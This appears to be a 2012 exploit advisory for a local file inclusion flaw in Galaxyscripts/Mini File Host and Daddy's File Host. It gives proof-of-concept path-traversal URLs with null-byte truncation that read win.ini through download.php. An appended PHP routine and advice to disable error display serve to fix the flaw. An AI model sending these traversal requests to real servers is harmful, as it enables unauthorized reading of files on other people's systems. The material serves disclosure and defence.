`####################################################
### Exploit Title: Galaxyscripts / Daddy's File Host (All Versions) Local File Inclusion Vulnerability
### Date: 09/08/2012
### Author: L0n3ly-H34rT
### Homepage: http://se3c.tk/
### Contact: [email protected]
### Software Link For Galaxyscripts 2.0 Beta : http://rapidshare.com/files/79821189/MFH_v2.0_Beta_webgraf.ru.rar
### Or Download Galaxyscripts 1.5 : http://www.phpkode.com/download/p/Mini_File_Host-1.5.zip
### Software Link For Daddy's : http://www.daddyscripts.com/download.php?file=dfh-v1.2.5.zip
### Tested on: Linux/Windows
### Approve For Galaxyscripts 2.0 Beta : http://upload.traidnt.net/upfiles/Fbq13249.png
### Approve For Galaxyscripts 1.5 : http://upload.traidnt.net/upfiles/ZHN13291.png
### Approve For Daddy's File Host 1.2.4 : http://upload.traidnt.net/upfiles/AT613341.png
####################################################
# Introduction :
These two scripts share the same source, but Galaxyscripts has not been supported for the last year, or maybe two; I don't know.
The author put a message on the script's homepage:
http://www.galaxyscripts.com/
The content of the message:
Mini File Host & GalaxyScripts
Hi Guys,
GalaxyScripts.com recently got hacked and I haven't had the time to patch everything up. I'm wrapping up some other projects. I have a new version of MiniFilehost in the making, it's completely being re-built from scratch, but it will be backwards compatible with your old files and configuration. The new version will use the Smarty Templating system so that new skins or templates can be easily made and modified. This separates the application layer from the presentation layer. In the meantime if you need a script for hosting files, you can use daddyscripts( http://www.daddyscripts.com/ ). -Steven Johal ( http://www.stevenjohal.com/ )
# P.O.C (1) For Daddy's File Host:
- First, sign up and log in as a user in Daddy's File Host to bypass some ads and get this to work.
- Then put this in the URL, e.g.:
http://127.0.0.1/dfh/download.php?file=../../../../../../../../../../windows/win.ini%00.jpg
- The first line of the file appears in the warning, e.g.:
Warning: filesize() [function.filesize]: stat failed for ./storage/; for 16-bit app support in C:\AppServ\www\dfh\download.php on line 164
----------------------------------------------------
# P.O.C (2) For Galaxyscripts :
- Just put this in the URL, e.g.:
http://127.0.0.1/MFH/download.php?file=../../../../../../../../../../windows/win.ini%00.jpg
- The first line of the file appears in the warning, e.g.:
Warning: filesize() [function.filesize]: stat failed for ./storage/; for 16-bit app support in C:\AppServ\www\MFH\download.php on line 142
# Note :
Requires magic_quotes_gpc = Off (when it is On, PHP escapes the null byte decoded from %00, so the filename is not truncated).
# Greetz to my friendz
`
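The warnings above show the `file` parameter being appended to `./storage/` and handed to `filesize()` unchecked. The following is an added example of validating that parameter before any filesystem call; it is not code from either script, `resolve_storage_path()` is a hypothetical helper, and it assumes stored files are flat names directly inside the storage directory.

```php
<?php
// Added example, not code from Mini File Host or Daddy's File Host.
// resolve_storage_path() is a hypothetical helper name. The "./storage/"
// directory and the "file" parameter come from the advisory's warning and URLs.
// Intended use in download.php (assumption):
//   $path = resolve_storage_path('./storage/', (string)($_GET['file'] ?? ''));
//   if ($path === null) { http_response_code(404); exit; }

function resolve_storage_path(string $storageDir, string $requested): ?string
{
    // "win.ini%00.jpg" decodes to "win.ini\0.jpg"; a NUL byte is never valid.
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    // Assumption: stored files are flat names, so separators and dot
    // directories are rejected instead of being "cleaned".
    if (preg_match('#[/\\\\]#', $requested) || $requested === '.' || $requested === '..') {
        return null;
    }
    $base = realpath($storageDir);
    if ($base === false) {
        return null;
    }
    // realpath() resolves symlinks and returns false for missing files.
    $full = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($full === false || !is_file($full)) {
        return null;
    }
    // Final containment check: the resolved path must sit under the base.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($full, $prefix, strlen($prefix)) === 0 ? $full : null;
}

// Constructed self-check: a temporary storage directory with one file.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'storage_demo_' . getmypid();
mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'report.jpg', 'x');
$cases = [
    'report.jpg',                           // legitimate stored name
    "../../../windows/win.ini\0.jpg",       // decoded form of the advisory's request
    '..',                                   // dot directory
    'missing.jpg',                          // not present in storage
];
foreach ($cases as $name) {
    $ok = resolve_storage_path($dir, $name) !== null;
    printf("%-40s %s\n", addcslashes($name, "\0"), $ok ? 'served' : 'rejected');
}
unlink($dir . DIRECTORY_SEPARATOR . 'report.jpg');
rmdir($dir);
```

Because the file content reaches the client through a PHP warning, setting `display_errors = Off` in production removes that disclosure channel independently of the path check.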